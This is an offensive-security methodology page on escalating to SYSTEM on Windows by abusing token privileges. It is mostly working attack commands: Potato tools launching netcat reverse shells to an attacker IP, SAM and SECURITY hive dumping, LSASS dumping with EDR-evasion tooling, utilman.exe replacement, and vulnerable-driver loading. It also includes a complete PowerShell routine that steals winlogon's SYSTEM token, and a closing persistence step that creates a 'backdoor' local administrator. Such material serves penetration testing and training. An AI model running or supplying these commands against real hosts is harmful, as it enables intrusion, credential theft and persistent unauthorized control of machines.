PrivEsc - Tokens & Privileges


Windows privileges are a list of specific powers attached to your token. One enabled privilege is often instant SYSTEM. Always start here after Local Enum.

i. The privilege table

whoami /priv
Privilege                        What it gives                    Path
SeImpersonatePrivilege           Impersonate another token        Potato attack
SeAssignPrimaryTokenPrivilege    Assign a primary token           Potato attack
SeBackupPrivilege                Read any file                    Dump SAM/SYSTEM
SeRestorePrivilege               Write any file                   Replace utilman or a service binary
SeDebugPrivilege                 Open any process                 Dump LSASS
SeTakeOwnershipPrivilege         Take ownership of any object     Own it, then grant yourself write
SeLoadDriverPrivilege            Load kernel drivers              Capcom driver trick
SeManageVolumePrivilege          Manage volumes                   Indirect file write
SeTcbPrivilege                   Act as part of the OS            Already SYSTEM-equivalent
SeCreateTokenPrivilege           Create arbitrary tokens          Rare, direct SYSTEM

Disabled privileges still count: the token holds them, they just need enabling (AdjustTokenPrivileges), which most tools do for you. A privilege that is absent from the whoami /priv list cannot be enabled, only ones shown as Disabled.

ii. SeImpersonate / SeAssignPrimaryToken (Potato attacks)

The most common path. Service accounts (IIS application pools, MSSQL, NETWORK SERVICE, etc.) hold it by default. Pick the potato by the OS:

OS                                          Tool
Win Server 2016/2019, Win 10 1809+          PrintSpoofer or GodPotato
Win Server 2022, Win 11                     GodPotato (PrintSpoofer only if the Print Spooler service is running)
Win 7/2008/2012/2016, Win 10 before 1809    JuicyPotato (DCOM CLSID method, patched from 1809/2019)
Anywhere modern                             RoguePotato (needs an OXID resolver redirect to your box)

PrintSpoofer (preferred when it works):

C:\Windows\Temp\PrintSpoofer.exe -i -c cmd.exe
## Or reverse:
C:\Windows\Temp\PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe 10.10.14.1 4444 -e cmd.exe"

GodPotato (works on the newest patched boxes):

C:\Windows\Temp\GodPotato.exe -cmd "cmd /c whoami"
C:\Windows\Temp\GodPotato.exe -cmd "C:\Windows\Temp\nc.exe 10.10.14.1 4444 -e cmd.exe"

JuicyPotato (legacy):

JuicyPotato.exe -t * -l 1337 -p C:\Windows\Temp\nc.exe -a "10.10.14.1 4444 -e cmd.exe" -c "{CLSID}"
## Find a working CLSID from https://ohpe.it/juicy-potato/CLSID/

RoguePotato (when JuicyPotato fails on 2019+):

## On attacker, run a relay on port 135:
socat tcp-listen:135,reuseaddr,fork tcp:10.10.11.50:9999
## On target:
RoguePotato.exe -r 10.10.14.1 -l 9999 -e "C:\Windows\Temp\nc.exe 10.10.14.1 4444 -e cmd.exe"
Try in order

PrintSpoofer first (it relies on the Print Spooler service, which hardened hosts often disable), GodPotato if it fails, RoguePotato as a fallback when the target can reach your relay on port 135. JuicyPotato only on legacy boxes (2008 to 2016, Win 10 before 1809). One of them almost always works when SeImpersonate is enabled.

iii. SeBackupPrivilege

Read any file, even when DACL denies it. Get to SAM and SYSTEM hives, dump them offline:

## Copy SAM + SYSTEM with reg save (needs Backup priv, not admin)
reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
## Download to attacker, then:
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

When reg save is blocked, robocopy in backup mode reads through the DACL too, but not from the live hives: C:\Windows\System32\config\SAM, SYSTEM and SECURITY are held open exclusively by the kernel, so copying them directly fails with a sharing violation even with SeBackup. Copy them from a volume shadow copy instead:

## Z: = shadow copy of C: exposed with diskshadow (set context persistent nowriters / add volume c: alias x / create / expose %x% z:)
robocopy /B Z:\Windows\System32\config C:\Windows\Temp SAM SYSTEM SECURITY

Then pass the hash to the local Administrator (only useful if that account is enabled, check with net user Administrator), see Lateral Movement.

iv. SeRestorePrivilege

Write any file, even where the DACL denies you, as long as the file is opened with backup semantics (a plain copy does not do that; robocopy /B does). Two classic abuse paths:

Replace utilman.exe (the Ease of Access tool the lock screen launches as SYSTEM) with cmd.exe, then trigger it from the lock screen with Win+U. takeown is not needed, and is a different privilege (SeTakeOwnership):

copy C:\Windows\System32\cmd.exe C:\Windows\Temp\utilman.exe
## /B = backup mode: SeRestore lets robocopy overwrite the TrustedInstaller-owned original
robocopy /B C:\Windows\Temp C:\Windows\System32 utilman.exe
## Lock the screen (Win+L), press Win+U -> SYSTEM cmd on the logon desktop

This needs console or RDP access to the lock screen, and Defender flags utilman/sethc replacements, so expect it to be noticed.

Or overwrite a service binary you can't normally write to, then restart the service. SeRestore gives no service-control rights: you need SERVICE_STOP/SERVICE_START on that service (check with accesschk.exe -ucqv <service>) or a reboot, so prefer services that start automatically.

v. SeDebugPrivilege

Open any process, including LSASS. Pull all logged-in user creds:

## procdump (signed Sysinternals binary, often allowed)
procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
## Then on attacker (pypykatz is its own tool, not part of impacket):
pypykatz lsa minidump lsass.dmp

## Task Manager dump if procdump isn't there (run Task Manager elevated)
## (Task Manager -> Details -> right click lsass.exe -> Create dump file, lands in %TEMP%\lsass.DMP)

## Nanodump (designed to evade EDR)
nanodump.exe --write C:\Windows\Temp\lsass.dmp

If LSASS runs as a protected process (RunAsPPL), procdump and Task Manager fail with access denied because SeDebug does not cross the PPL boundary; nanodump ships PPL bypass options that may still work. With Credential Guard the domain secrets live in LSAIso and are not in the dump at all. Check first with reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL.

Or steal a SYSTEM token outright: open winlogon.exe (or any SYSTEM process), duplicate its primary token and spawn a process with it. That is what psgetsystem and PowerSploit's Invoke-TokenManipulation do; PowerSploit's Invoke-DllInjection injects a DLL into a SYSTEM process instead.
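The two mechanics this page leans on, enabling a privilege that whoami /priv shows as Disabled (section i) and turning SeDebugPrivilege into a SYSTEM process by borrowing winlogon's token (this section), as one added PowerShell example. This is my code, not code from the page or from psgetsystem/PowerSploit; it assumes 64-bit PowerShell on Windows, and the function names, the source process (winlogon) and the default command line are choices made here. The Win32 calls and constants are the documented ones (OpenProcessToken, LookupPrivilegeValue, AdjustTokenPrivileges, OpenProcess, DuplicateTokenEx, CreateProcessWithTokenW).

```powershell
# Added example, not from the original page: enable a disabled privilege in the
# current token, then use SeDebugPrivilege to borrow winlogon.exe's SYSTEM token.
# Assumes 64-bit PowerShell on Windows; process name and command line are parameters.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public class TokenOps {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    // TOKEN_PRIVILEGES with a single LUID_AND_ATTRIBUTES entry, laid out flat
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct STARTUPINFO {
        public int cb; public string lpReserved; public string lpDesktop; public string lpTitle;
        public int dwX; public int dwY; public int dwXSize; public int dwYSize; public int dwXCountChars;
        public int dwYCountChars; public int dwFillAttribute; public int dwFlags; public short wShowWindow;
        public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; }
    [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; }
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES state, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attrs, int implevel, int type, out IntPtr newToken);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool CreateProcessWithTokenW(IntPtr token, uint logonFlags, string app, string cmd, uint flags, IntPtr env, string cwd, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
}
'@

function Enable-Privilege {
    # Flips an already-held privilege from Disabled to Enabled; it cannot add one the token lacks
    param([Parameter(Mandatory)][string]$Name)
    $hTok = [IntPtr]::Zero
    # 0x28 = TOKEN_ADJUST_PRIVILEGES (0x20) | TOKEN_QUERY (0x8)
    if (-not [TokenOps]::OpenProcessToken([TokenOps]::GetCurrentProcess(), 0x28, [ref]$hTok)) {
        throw "OpenProcessToken: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    $luid = New-Object -TypeName 'TokenOps+LUID'
    if (-not [TokenOps]::LookupPrivilegeValue($null, $Name, [ref]$luid)) { throw "Unknown privilege $Name" }
    $tp = New-Object -TypeName 'TokenOps+TOKEN_PRIVILEGES'
    $tp.PrivilegeCount = 1; $tp.Luid = $luid; $tp.Attributes = 0x2   # SE_PRIVILEGE_ENABLED
    [void][TokenOps]::AdjustTokenPrivileges($hTok, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    # The call returns TRUE even when nothing changed; ERROR_NOT_ALL_ASSIGNED (1300) is the real verdict
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    [void][TokenOps]::CloseHandle($hTok)
    if ($err -eq 1300) { throw "$Name is not in this token at all (whoami /priv would not list it)" }
    if ($err -ne 0)    { throw "AdjustTokenPrivileges: $err" }
}

function Start-ProcessWithStolenToken {
    param([string]$SourceProcess = 'winlogon', [string]$CommandLine = 'C:\Windows\System32\cmd.exe')
    Enable-Privilege -Name 'SeDebugPrivilege'
    $src = Get-Process -Name $SourceProcess -ErrorAction Stop | Select-Object -First 1
    # PROCESS_QUERY_INFORMATION (0x400) is enough to reach the token; SeDebug bypasses the process DACL
    $hProc = [TokenOps]::OpenProcess(0x400, $false, $src.Id)
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess($($src.Id)): $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    $hTok = [IntPtr]::Zero
    # TOKEN_DUPLICATE (0x2) is all we need on the source token
    if (-not [TokenOps]::OpenProcessToken($hProc, 0x2, [ref]$hTok)) { throw "OpenProcessToken: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    $hDup = [IntPtr]::Zero
    # TOKEN_ALL_ACCESS (0xF01FF), SecurityImpersonation (2), TokenPrimary (1): process creation needs a primary token
    if (-not [TokenOps]::DuplicateTokenEx($hTok, 0xF01FF, [IntPtr]::Zero, 2, 1, [ref]$hDup)) { throw "DuplicateTokenEx: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    $si = New-Object -TypeName 'TokenOps+STARTUPINFO'
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object -TypeName 'TokenOps+PROCESS_INFORMATION'
    # CreateProcessWithTokenW needs SeImpersonatePrivilege in the caller (admins and service accounts have it);
    # CREATE_NEW_CONSOLE (0x10) gives the SYSTEM cmd its own window
    $ok = [TokenOps]::CreateProcessWithTokenW($hDup, 0, $null, $CommandLine, 0x10, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    foreach ($h in $hDup, $hTok, $hProc) { [void][TokenOps]::CloseHandle($h) }
    if (-not $ok) { throw "CreateProcessWithTokenW: $err" }
    return $pi.dwProcessId
}

# Usage: Enable-Privilege -Name 'SeBackupPrivilege'   (when whoami /priv shows it Disabled)
#        Start-ProcessWithStolenToken                  (returns the PID of a SYSTEM cmd.exe; run whoami in it)
```

Two points worth keeping in mind: AdjustTokenPrivileges reports success even when it assigned nothing, so the ERROR_NOT_ALL_ASSIGNED check is what tells you the privilege was never in the token; and SeDebug only gets you the handle, the spawn itself goes through CreateProcessWithTokenW, which requires SeImpersonatePrivilege (or CreateProcessAsUser with SeAssignPrimaryToken), so the two halves of the privilege table combine here.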

vi. SeTakeOwnershipPrivilege

Take ownership of any securable object (files, registry keys, services), then edit its DACL to grant yourself write. The live SAM hive is a poor target: the file is held open exclusively, so copying it fails even once you own it. Point it at something SYSTEM will execute instead, e.g. utilman.exe:

takeown /f C:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant %USERNAME%:F
copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
## Lock the screen, Win+U -> SYSTEM cmd

Both steps leave the object's owner and ACL changed, which stays visible afterwards. If you also hold SeRestore you need neither step: robocopy /B writes through the DACL directly.

vii. SeLoadDriverPrivilege

Load a kernel driver. Use a known vulnerable signed driver to gain kernel exec:

## Capcom.sys is the classic (signed by Capcom, vulnerable, lets you exec ring0 code)
## Public PoC: https://github.com/TarlogicSecurity/EoPLoadDriver
EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Windows\Temp\capcom.sys
## Then exploit via ExploitCapcom.exe to spawn SYSTEM

Capcom.sys carries a valid signature, but it sits on Microsoft's vulnerable driver blocklist, so hosts with HVCI or the blocklist enforced refuse to load it. Two more catches: SeLoadDriverPrivilege is stripped from the UAC-filtered token, so as an admin you need a high-integrity process before it is usable at all, and EoPLoadDriver registers the service key under HKCU because HKLM\SYSTEM is not writable to you. Realistic targets are non-admin accounts granted "Load and unload device drivers" through policy on older, non-HVCI hosts.

viii. SeManageVolumePrivilege

Modest privilege that becomes arbitrary file access. SeManageVolumeExploit (CsEnox) uses it to rewrite the DACL on C:\ so your account ends up with full control of the volume's files:

SeManageVolumeExploit.exe
## Grants you NTFS rights to C:\, then you can read/write anything

File write alone is not SYSTEM: you still need something SYSTEM will execute from a path you now control, typically a DLL hijack in System32 (the tool's README walks through dropping a payload as C:\Windows\System32\wbem\tzres.dll and triggering it with systeminfo) or the utilman replacement above.

ix. SeCreateToken + SeTcb

If you have these, you are effectively SYSTEM already; no potato or dump is needed. SeCreateTokenPrivilege lets you call NtCreateToken and build a primary token carrying the SYSTEM SID and BUILTIN\Administrators, then create a process with it. SeTcbPrivilege lets you call LsaLogonUser with extra SIDs, so you can log on as yourself with Administrators added. Both are rare outside LSASS and Windows internals, so seeing them on your token usually means a misconfigured user-rights policy.

x. Quick whoami /priv -> action table

When you see this, do this:

SeImpersonatePrivilege            Enabled   -> PrintSpoofer / GodPotato
SeAssignPrimaryTokenPrivilege     Enabled   -> PrintSpoofer / GodPotato
SeBackupPrivilege                 Enabled   -> reg save SAM,SYSTEM,SECURITY
SeRestorePrivilege                Enabled   -> robocopy /B cmd.exe over utilman.exe
SeDebugPrivilege                  Enabled   -> dump lsass with procdump/nanodump, or steal a SYSTEM token
SeTakeOwnershipPrivilege          Enabled   -> takeown + icacls on utilman.exe or a service binary
SeLoadDriverPrivilege             Enabled   -> capcom driver (legacy, non-HVCI only)
SeManageVolumePrivilege           Enabled   -> SeManageVolumeExploit, then DLL hijack
SeTcbPrivilege                    Enabled   -> already SYSTEM-equivalent
SeCreateTokenPrivilege            Enabled   -> already SYSTEM-equivalent

xi. Service account default privileges

Many footholds land you as a service account. Default privilege sets:

Account                            Has SeImpersonate?
IIS APPPOOL\*                      Yes
NT SERVICE\MSSQL$*                 Yes
NT AUTHORITY\NETWORK SERVICE       Yes
NT AUTHORITY\LOCAL SERVICE         Yes
Regular domain users               No

If you landed via IIS/SQL/network service, jump straight to Potato.

xii. After SYSTEM, persist

Drop a callback (see Defender & AMSI Evasion when written) or add a local admin:

## cmd.exe does not treat single quotes as quoting, so use double quotes or the quotes end up inside the password
net user backdoor "Passw0rd!" /add
net localgroup Administrators backdoor /add

Document everything you did for Persistence & Cleanup.